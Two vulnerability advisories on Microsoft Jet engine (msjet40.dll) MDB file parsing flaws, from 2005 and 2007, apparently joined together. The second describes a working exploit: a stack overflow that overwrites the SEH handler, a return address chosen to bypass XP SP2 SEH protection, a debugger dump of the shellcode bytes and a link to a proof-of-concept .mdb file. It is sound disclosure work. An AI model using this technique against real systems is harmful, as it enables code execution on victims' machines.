-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Microsoft Jet DB engine vulnerabilities
Classification:
===============
Level: low-med-[HIGH]-crit
ID: HEXVIEW*2005*03*31*1
URL: http://www.hexview.com/docs/20050331-1.txt
Overview:
=========
Microsoft Jet database is a lightweight database widely used by MS Office
applications. msjet40.dll is the main component of the Microsoft Jet database
engine which evaluates and carries out requests for data. The library handles
reading and writing of the data for Microsoft Access databases. HexView
noticed multiple occurrences where file data was not validated or improperly
validated leading to system crashes, null pointer memory access conditions, and
arbitrary code execution. This advisory is focused on just one vulnerability
that we confirmed to be exploitable.
Affected products:
==================
All tests were performed using the latest avaliable msjet40.dll library
(version 4.00.8618.0). We did not test earlier versions, but it should be
assumed that all earlier releases of the library are also vulnerable. Please
note that MS JetDB OLE Provider (msjetoledb40.dll) is not affected by this
problem. Only software products that utilize msjet40.dll are affected,
including Microsoft Access.
Cause and Effect:
=================
Sufficient data validation is not performed when msjet40.dll parses the
database file. As a result, it is possible to modify database file to cause
a code of attacker's choice to be launched when MS Jet database is opened.
Demonstration:
==============
Below is a fragment of an empty *.mdb file. Note the sequence of 0x77
characters on line #3. When msjet40.dll parses this part of the file, it
triggers an exception.
000023B0: 00 00 04 00-49 00 64 00-18 00 50 00-61 00 72 00 ....I.d...P.a.r.
000023C0: 65 00 6E 00-74 00 49 00-64 00 4E 00-61 00 6D 00 e.n.t.I.d.N.a.m.
000023D0: 65 00 77 77-77 77 00 00-05 06 00 00-08 00 02 06 e.wwww..........
000023E0: 00 00 03 06-00 00 0D 00-08 06 00 00-09 06 00 00 ................
000023F0: 10 00 0E 06-00 00 0F 06-00 00 0F 00-0C 06 00 00 ................
Explanation:
============
Below is a code fragment from msjet40.dll that is responsible for the crash.
Atacker directly controls the value of AX. The value goes through a signed
expansion that is used to access 32-bit pointer to the variable that stores
the address of a call table.
movsx eax, ax
mov ecx, [edi+eax*4+0B0h]
mov edx, [ecx]
call dword ptr [edx+10h]
The accessible memory range contains portions of original file, which makes
possible to load instruction pointer with the value pointing to malicious
code embedded in the document. The issue is trivial to exploit and the
exploit is very portable as the attacker does not need to know absolute code
addresses.
Vendor Status:
==============
Microsoft was notified on March 30, 2005. Message acknowledged by an
automated reply. No human response received.
About HexView:
==============
HexView contributes to online security-related lists for almost a decade.
The scope of our expertize spreads over Windows, Linux, Sun, MacOS platforms,
network applications, and embedded devices. We also offer a variety of
consulting services. For more information visit http://www.hexview.com
Distribution:
=============
This document may be freely distributed through any channels as long as
the contents are kept unmodified. Commercial use of the information in
the document is not allowed without written permission from HexView
signed by our pgp key. Please direct all questions to vtalk@hexview.com
HexView Disclosure Policy:
==========================
HexView notifies vendors with publicly available contact e-mail addresses
24 hours before disclosing any information to the public. If we are unable
to find vendor's e-mail address or if no human reply is received within 24
hours, HexView will publish vulnerability notification including all technical
details unless the issue is rated as "critical". If vendor does not reply
within 72 hours, HexView may disclose all details for critical vulnerabilities
as well. HexView will publish all details of low-rated vulnerabilities 24 hours
after vendor notification unless there are considerable factors not to do so.
For vulnerabilities rated "high" and "critical":
If vendor replies within the above mentioned time period, HexView will announce
the vulnerability, but will not disclose the details required to reproduce it.
HexView will also specify the date when a full disclosure containing all the
details will be published. The time period between the announcement and full
disclosure is 30 days unless there is an agreement with vendor and appropriate
justification for extension. If vendor resolves the issue earlier than 30 days
after announcement, HexView may publish full disclosure earlier providing that
vendor's patch is available to the public.
HexView reserves the right to publish any detail of any vulnerability at
any time.
Feedback and comments:
======================
Feedback and questions about this disclosure are welcome at vtalk@hexview.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)
iD8DBQFCTG+cDPV1+KQrDqQRAsgKAKCi4tIPn8PooReYStHq3KEYdzgW8wCgiNaP
Trdxg5c6kCkoLlyYeodIhPU=
=rglE
-----END PGP SIGNATURE-----
Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
Summary:
A remote code execute vulnerability exists in Microsoft Jet Engine. A remote attacker who successfully exploit this vulnerability can execute arbitrary code on the affected system.
Affected Software Versions:
Microsoft Office Access 2003 sp3 on Windows XP SP2(chinese)
(Other versions may also be affected)
Details:
When Microsoft Office Access parsing a MDB file, it will call the Jet Engine (msjet40.dll) to parse it. See the attched file "Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb", it will cause a stack overflow vulnerability finally in the following codes:
(C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)
.text:1B0B72BB mov ecx, edx ; ecx=0x5200
.text:1B0B72BD mov esi, edi ; esi point to the datas
.text:1B0B72BF mov ebp, ecx ; which can be find in the mdb file
.text:1B0B72C1 lea edi, [esp+40h] ; edi point to stack memory
.text:1B0B72C5 shr ecx, 2
.text:1B0B72C8 rep movsd ; stack overflow!!
.text:1B0B72CA mov ecx, ebp
.text:1B0B72CC mov eax, [eax+1]
.text:1B0B72CF and ecx, 3
.text:1B0B72D2 rep movsb
Debug Informations as follows:
eax=05f5cb67 ebx=05e66458 ecx=00005200 edx=00005200 esi=05f5cd12 edi=0013db60
eip=1b0b72c5 esp=0013db20 ebp=00005200 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
0:000> u eip
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
1b0b72c8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
1b0b72ca 8bcd mov ecx,ebp
1b0b72cc 8b4001 mov eax,dword ptr [eax+1]
1b0b72cf 83e103 and ecx,3
1b0b72d2 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
1b0b72d4 8bb424d4000000 mov esi,dword ptr [esp+0D4h]
1b0b72db 8b4b28 mov ecx,dword ptr [ebx+28h]
0:000> db esi
05f5cd12 00 4f 00 53 00 7e 00 31-00 5c 00 56 00 42 00 41 .O.S.~.1.\.V.B.A
05f5cd22 00 5c 00 56 00 42 00 41-00 36 00 5c 00 56 00 42 .\.V.B.A.6.\.V.B
05f5cd32 00 45 00 36 00 2e 00 44-00 4c 00 4c 00 23 00 56 .E.6...D.L.L.#.V
05f5cd42 00 69 00 73 00 75 00 61-00 6c 00 20 00 42 00 61 .i.s.u.a.l. .B.a
05f5cd52 00 73 00 69 00 63 00 20-00 46 00 6f 00 72 00 20 .s.i.c. .F.o.r.
05f5cd62 00 41 00 70 00 70 00 6c-00 69 00 63 00 61 00 74 .A.p.p.l.i.c.a.t
05f5cd72 00 69 00 6f 00 6e 00 73-00 00 00 00 00 00 00 00 .i.o.n.s........
05f5cd82 00 00 00 00 00 12 01 2a-00 5c 00 47 00 7b 00 34 .......*.\.G.{.4
0:000> db edi
0013db60 09 00 00 00 01 00 00 00-18 00 00 00 9a 51 00 1b .............Q..
0013db70 86 ce 00 1b 00 c0 f5 05-02 00 00 00 e8 dc 13 00 ................
0013db80 22 7c 00 1b 0c 11 f4 05-e8 dc 13 00 c0 10 f4 05 "|..............
0013db90 3c cd 00 1b c0 10 f4 05-00 c0 f5 05 9c 78 e6 05 <............x..
0013dba0 e8 dc 13 00 05 10 92 7c-38 78 e6 05 eb cb 00 1b .......|8x......
0013dbb0 80 9f a4 05 b0 98 a4 05-01 00 00 00 f2 cb 00 1b ................
0013dbc0 9c 78 e6 05 e8 dc 13 00-4c dc 13 00 4c dc 13 00 .x......L...L...
0013dbd0 01 00 00 00 60 f3 00 1b-80 9f a4 05 02 00 00 00 ....`...........
The length of 0x5200 is enough to make us to write datas to the address where the SEH handle pointer is, so that we can rewrite the SEH handle. I use following address to jump to shellcode:
1B0D4C42 FF55 0C call dword ptr [ebp+C]
This address is also in msjet40.dll, so it can bypass the security feature of SEH in Windows XP SP2, and [ebp+0Ch] happens to point to the source data.
Debug Informations:
eax=00000000 ebx=00000000 ecx=1b0d4c42 edx=7c9237d8 esi=00000000 edi=00000000
eip=1b0d4c42 esp=0013d750 ebp=0013d770 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
msjet40!Ordinal310+0x17e:
1b0d4c42 ff550c call dword ptr [ebp+0Ch] ss:0023:0013d77c=0013e184
0:000> dd ebp
0013d770 0013d820 7c92378b 0013d838 0013e184
0013d780 0013d854 0013d80c 1b0d4c42 00140000
0013d790 0013d838 0013e184 7c957860 0013d838
0013d7a0 0013e184 0013d854 0013d80c 1b0d4c42
0013d7b0 00140000 0013d838 05f5f1b2 00000000
0013d7c0 00000000 05e66458 01000000 0013d774
0013d7d0 01c8281c 0013da04 7c92ee18 7c98d8a8
0013d7e0 ffffffff 7c98d886 7c969d18 04ba0000
0:000> db 0013e184
0013e184 75 06 74 04 42 4c 0d 1b-fc e8 44 00 00 00 8b 45 u.t.BL....D....E
0013e194 3c 8b 7c 05 78 01 ef 8b-4f 18 8b 5f 20 01 eb 49 <.|.x...O.._ ..I
0013e1a4 8b 34 8b 01 ee 31 c0 99-ac 84 c0 74 07 c1 ca 0d .4...1.....t....
0013e1b4 01 c2 eb f4 3b 54 24 04-75 e5 8b 5f 24 01 eb 66 ....;T$.u.._$..f
0013e1c4 8b 0c 4b 8b 5f 1c 01 eb-8b 1c 8b 01 eb 89 5c 24 ..K._.........\$
0013e1d4 04 c3 31 c0 64 8b 40 30-85 c0 78 0c 8b 40 0c 8b ..1.d.@0..x..@..
0013e1e4 70 1c ad 8b 68 08 eb 09-8b 80 b0 00 00 00 8b 68 p...h..........h
0013e1f4 3c 5f 31 f6 60 56 89 f8-83 c0 7b 50 68 7e d8 e2 <_1.`V....{Ph~..
Content at [ebp+0c]:
|75 06| + |74 04| + |42 4C 0D 1B| + |FC E8 44 00 ...
{JNZ 6} + {JZ 4} + 1B0D4C42h + shellcode
Related content in the attached file "Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" is from the offset 0x3336 of beginning of the file.
Notice that because the vulnerability is in the Jet Engine, some web space providers may also be affected, the attacker can upload the .asp and .mdb file, and exploit it via the Server Object "ADODB.Connection".
How to Reproduce:
Open the attached file "Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" with Office Access 2003 sp3 on Windows XP SP2, then "calc.exe" will be executed, please do not use the exploit for attacking.
The attached file is at:
http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6
Vendor Response:
Microsoft replied me that they would not fix this vulnerability, it looks like they will not acknowledge vulnerabilities which are from .mdb file.
"You appear to be reporting an issue with a file type Microsoft considers to be unsafe. Many programs, such as Internet Explorer and Outlook, automatically block these files. For more information, please visit http://support.microsoft.com/kb/925330"
Disclosure Timeline:
2007.11.06 Vendor notified via email
2007.11.07 Vendor responded
2007.11.16 Advisory released
--EOF--